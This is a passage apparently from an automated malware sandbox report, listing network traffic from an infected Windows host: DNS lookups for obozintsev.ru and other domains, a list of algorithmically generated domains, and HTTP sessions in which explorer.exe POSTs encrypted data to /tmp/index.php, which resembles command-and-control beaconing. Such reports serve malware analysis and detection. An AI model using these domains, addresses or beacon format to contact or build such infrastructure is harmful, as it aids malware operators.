Nov 30, 2024 11:14:56.055958986 CET	50046	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:14:56.055989027 CET	443	50046	207.246.75.248	192.168.2.4
Nov 30, 2024 11:15:27.606290102 CET	50061	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:27.726496935 CET	80	50061	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:27.726646900 CET	50061	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:27.765614033 CET	50061	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:27.765676975 CET	50061	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:27.885701895 CET	80	50061	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:27.885715961 CET	80	50061	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:29.907083035 CET	80	50061	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:29.907196045 CET	80	50061	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:29.907269001 CET	50061	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:29.907381058 CET	50061	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:30.027416945 CET	80	50061	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:37.599111080 CET	50062	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:37.719223022 CET	80	50062	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:37.719434977 CET	50062	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:37.719506025 CET	50062	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:37.719540119 CET	50062	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:37.839412928 CET	80	50062	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:37.839538097 CET	80	50062	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:39.773937941 CET	80	50062	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:39.773993969 CET	80	50062	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:39.774346113 CET	50062	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:39.774346113 CET	50062	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:39.894500971 CET	80	50062	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:40.087188959 CET	443	50046	207.246.75.248	192.168.2.4
Nov 30, 2024 11:15:40.087292910 CET	50046	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:15:40.087393999 CET	50046	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:15:40.087438107 CET	443	50046	207.246.75.248	192.168.2.4
Nov 30, 2024 11:15:40.097280025 CET	50063	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:15:40.097316980 CET	443	50063	207.246.75.248	192.168.2.4
Nov 30, 2024 11:15:40.097376108 CET	50063	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:15:40.098084927 CET	50063	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:15:40.098135948 CET	443	50063	207.246.75.248	192.168.2.4
Nov 30, 2024 11:15:40.098187923 CET	50063	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:15:40.515969992 CET	50064	443	192.168.2.4	103.35.190.240
Nov 30, 2024 11:15:40.515994072 CET	443	50064	103.35.190.240	192.168.2.4
Nov 30, 2024 11:15:40.516072989 CET	50064	443	192.168.2.4	103.35.190.240
Nov 30, 2024 11:15:40.516452074 CET	50064	443	192.168.2.4	103.35.190.240
Nov 30, 2024 11:15:40.516464949 CET	443	50064	103.35.190.240	192.168.2.4
Nov 30, 2024 11:15:48.662132978 CET	50065	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:48.782183886 CET	80	50065	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:48.782263041 CET	50065	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:48.782426119 CET	50065	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:48.782447100 CET	50065	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:48.902309895 CET	80	50065	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:48.902446985 CET	80	50065	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:50.871936083 CET	80	50065	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:50.872126102 CET	80	50065	123.213.233.131	192.168.2.4
Nov 30, 2024 11:15:50.872340918 CET	50065	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:50.872340918 CET	50065	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:15:50.992364883 CET	80	50065	123.213.233.131	192.168.2.4
Nov 30, 2024 11:16:00.493751049 CET	50066	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:16:00.614087105 CET	80	50066	123.213.233.131	192.168.2.4
Nov 30, 2024 11:16:00.614168882 CET	50066	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:16:00.614301920 CET	50066	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:16:00.614326000 CET	50066	80	192.168.2.4	123.213.233.131
Nov 30, 2024 11:16:00.735229969 CET	80	50066	123.213.233.131	192.168.2.4
Nov 30, 2024 11:16:00.735362053 CET	80	50066	123.213.233.131	192.168.2.4
Nov 30, 2024 11:16:02.791148901 CET	80	50066	123.213.233.131	192.168.2.4
Nov 30, 2024 11:16:02.791171074 CET	80	50066	123.213.233.131	192.168.2.4
Nov 30, 2024 11:16:02.791232109 CET	50066	80	192.168.2.4	123.213.233.131

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2024 11:12:20.192096949 CET	55162	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:12:21.211153030 CET	55162	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:12:22.238938093 CET	55162	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:12:24.241425991 CET	55162	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:12:24.784635067 CET	53	55162	1.1.1.1	192.168.2.4
Nov 30, 2024 11:12:24.784678936 CET	53	55162	1.1.1.1	192.168.2.4
Nov 30, 2024 11:12:24.784686089 CET	53	55162	1.1.1.1	192.168.2.4
Nov 30, 2024 11:12:24.784727097 CET	53	55162	1.1.1.1	192.168.2.4
Nov 30, 2024 11:13:09.509634972 CET	56155	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:13:10.522713900 CET	56155	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:13:10.655658960 CET	53	56155	1.1.1.1	192.168.2.4
Nov 30, 2024 11:13:10.660612106 CET	53	56155	1.1.1.1	192.168.2.4
Nov 30, 2024 11:14:11.102834940 CET	53334	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:14:11.850492001 CET	53	53334	1.1.1.1	192.168.2.4
Nov 30, 2024 11:15:26.713681936 CET	64618	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:15:27.596349955 CET	53	64618	1.1.1.1	192.168.2.4
Nov 30, 2024 11:15:40.128400087 CET	56154	53	192.168.2.4	1.1.1.1
Nov 30, 2024 11:15:40.508466005 CET	53	56154	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2024 11:12:20.192096949 CET	192.168.2.4	1.1.1.1	0xb2de	Standard query (0)	obozintsev.ru	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:21.211153030 CET	192.168.2.4	1.1.1.1	0xb2de	Standard query (0)	obozintsev.ru	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:22.238938093 CET	192.168.2.4	1.1.1.1	0xb2de	Standard query (0)	obozintsev.ru	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.241425991 CET	192.168.2.4	1.1.1.1	0xb2de	Standard query (0)	obozintsev.ru	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:13:09.509634972 CET	192.168.2.4	1.1.1.1	0x11f5	Standard query (0)	midginvineco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:13:10.522713900 CET	192.168.2.4	1.1.1.1	0x11f5	Standard query (0)	midginvineco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:14:11.102834940 CET	192.168.2.4	1.1.1.1	0x1e61	Standard query (0)	jamforvaise.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:26.713681936 CET	192.168.2.4	1.1.1.1	0xd2c1	Standard query (0)	obozintsev.ru	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:40.128400087 CET	192.168.2.4	1.1.1.1	0x2fb3	Standard query (0)	telphboardline.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.163.166.52	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	119.194.160.37	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	186.137.126.27	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	201.103.72.35	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.143.204.110	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784635067 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.212.43.225	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.163.166.52	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	119.194.160.37	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	186.137.126.27	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	201.103.72.35	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.143.204.110	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784678936 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.212.43.225	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.163.166.52	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	119.194.160.37	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	186.137.126.27	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	201.103.72.35	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.143.204.110	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784686089 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.212.43.225	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.163.166.52	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	119.194.160.37	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	186.137.126.27	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	201.103.72.35	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	189.143.204.110	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:12:24.784727097 CET	1.1.1.1	192.168.2.4	0xb2de	No error (0)	obozintsev.ru	123.212.43.225	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:13:10.655658960 CET	1.1.1.1	192.168.2.4	0x11f5	No error (0)	midginvineco.com	23.145.40.181	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:13:10.660612106 CET	1.1.1.1	192.168.2.4	0x11f5	No error (0)	midginvineco.com	23.145.40.181	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:14:11.850492001 CET	1.1.1.1	192.168.2.4	0x1e61	No error (0)	jamforvaise.com	207.246.75.248	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	119.194.160.37	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	186.137.126.27	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	201.103.72.35	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	189.143.204.110	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	123.212.43.225	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:27.596349955 CET	1.1.1.1	192.168.2.4	0xd2c1	No error (0)	obozintsev.ru	189.163.166.52	A (IP address)	IN (0x0001)	false
Nov 30, 2024 11:15:40.508466005 CET	1.1.1.1	192.168.2.4	0x2fb3	No error (0)	telphboardline.com	103.35.190.240	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

midginvineco.com

klvjvwlocecf.net

obozintsev.ru

totrulptsxj.net

fkyftbqjpntne.com

vwrmkfcdqeqnf.net

ybhmruutgjll.com

idmlsaxfuvndeti.net

dqwcacyxyiufxcg.net

vbibiexffybg.com

rcoksbrtpdmb.com

limsldbbguqnsba.com

indpkapnwuhe.net

wdrrntcgtbyvfp.net

ehvxkgepwxtygl.com

tejbjmlbuatgr.org

otfwaojfoxegoc.org

kqylhpxweftfa.org

fgrdwevlbrdtr.com

natewkewlwih.com

fhaalrvyqueiyk.net

ujchxvegkeooch.org

pkapxutderw.org

dqdghghmtaygindm.com

ievirvwtsxbiyvql.com

cdwxnwopeyrbni.org

fgbhvviibbt.org

miptxmfamtohobtx.net

jwqwkqwentbhrv.com

rtjqjvueogqtxkos.org

ghrwspfuixcrwvx.net

qyqahwjnqtjwf.com

jjaaaitryycjvb.net

reqhcetbeojgkny.net

nsgtchrbqowj.org

kjjcaejlhnascj.net

ansopymmtehxip.org

wyqtmqrstxfymqsq.org

ngsmolqmjlkr.com

xwimesajyti.org

qasfskgmelreo.net

xgfnddjygdt.org

ciuapvhjnqxsxxwr.com

egomlfgoxoteaymh.net

ewsvhrknjfqh.com

uqjegtiiabqrm.org

mdwlauviipmapdo.com

pjedtjbwdoay.org

buqwtxgqsqkupxr.net

lxgihqdoncikbgg.com

pktfnvaxqpxmxps.net

gsuntxougdhs.com

unxnurhhgcwb.org

cvixokerumeto.org

fsnaumbblcik.net

uwalktmlxvraf.com

omlavaayevr.net

iopuyoenyjytdheg.org

xajywliqqhjs.com

cjnppqrvkvd.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:24.908046961 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://klvjvwlocecf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: obozintsev.ru
Nov 30, 2024 11:12:24.908066034 CET	287	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 21 da f9 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA .[k,vu%!xxQut$z(xk<o'mPRJ)R0C`?IPp&/"1X5/!x(WnSq)0iqFehZi^y92&\|
Nov 30, 2024 11:12:26.650377035 CET	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 81 ed Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:26.785270929 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://totrulptsxj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: obozintsev.ru
Nov 30, 2024 11:12:26.785303116 CET	335	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 64 29 c3 8e Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vud)zHE`t`a(zF`&;[cQ30.^dQgZ4a^IJQ3VtX[/idjzmE\|}j3)W0
Nov 30, 2024 11:12:28.533607960 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:28.662853003 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fkyftbqjpntne.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: obozintsev.ru
Nov 30, 2024 11:12:28.662890911 CET	203	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5b 15 b2 98 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu[dLSOag8Q]/gA[#a]J]&Z.AO`N6DBsJuVdV]
Nov 30, 2024 11:12:30.464797974 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:30 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:30.587718010 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vwrmkfcdqeqnf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: obozintsev.ru
Nov 30, 2024 11:12:30.587743998 CET	345	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 28 2e ae a2 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu(.&xq.bI'fMA+E3B9/?3%CksYZG\|wjwzEK@'7{FBj'X^w
Nov 30, 2024 11:12:32.393549919 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:32.517201900 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybhmruutgjll.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: obozintsev.ru
